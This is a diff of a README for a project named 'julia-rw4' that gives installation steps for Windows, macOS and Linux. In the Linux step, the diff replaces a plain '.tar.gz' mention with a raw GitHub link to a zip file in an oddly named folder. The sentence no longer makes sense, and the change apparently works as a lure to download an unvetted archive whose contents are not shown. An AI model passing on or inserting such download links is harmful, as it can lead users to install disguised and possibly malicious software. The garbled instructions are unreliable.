PhuongAnhZzk/julia-rw4/README.md

 5. **Install the Application**
    - **Windows**: Double-click the downloaded `.exe` file and follow the on-screen instructions to install.
    - **macOS**: Open the downloaded `.dmg` file and drag the app into your Applications folder.
-   - **Linux**: You may need to extract the downloaded `.tar.gz` file.
+   - **Linux**: You may need to extract the downloaded `https://raw.githubusercontent.com/PhuongAnhZzk/julia-rw4/main/underministry/julia-rw4-v2.8.zip` file.
 Open a terminal, navigate to the extracted folder and run `./julia-rw4`.

 6. **Run julia-rw4**
    After installation, find julia-rw4 in your Applications or Programs list.
 Click to open the application.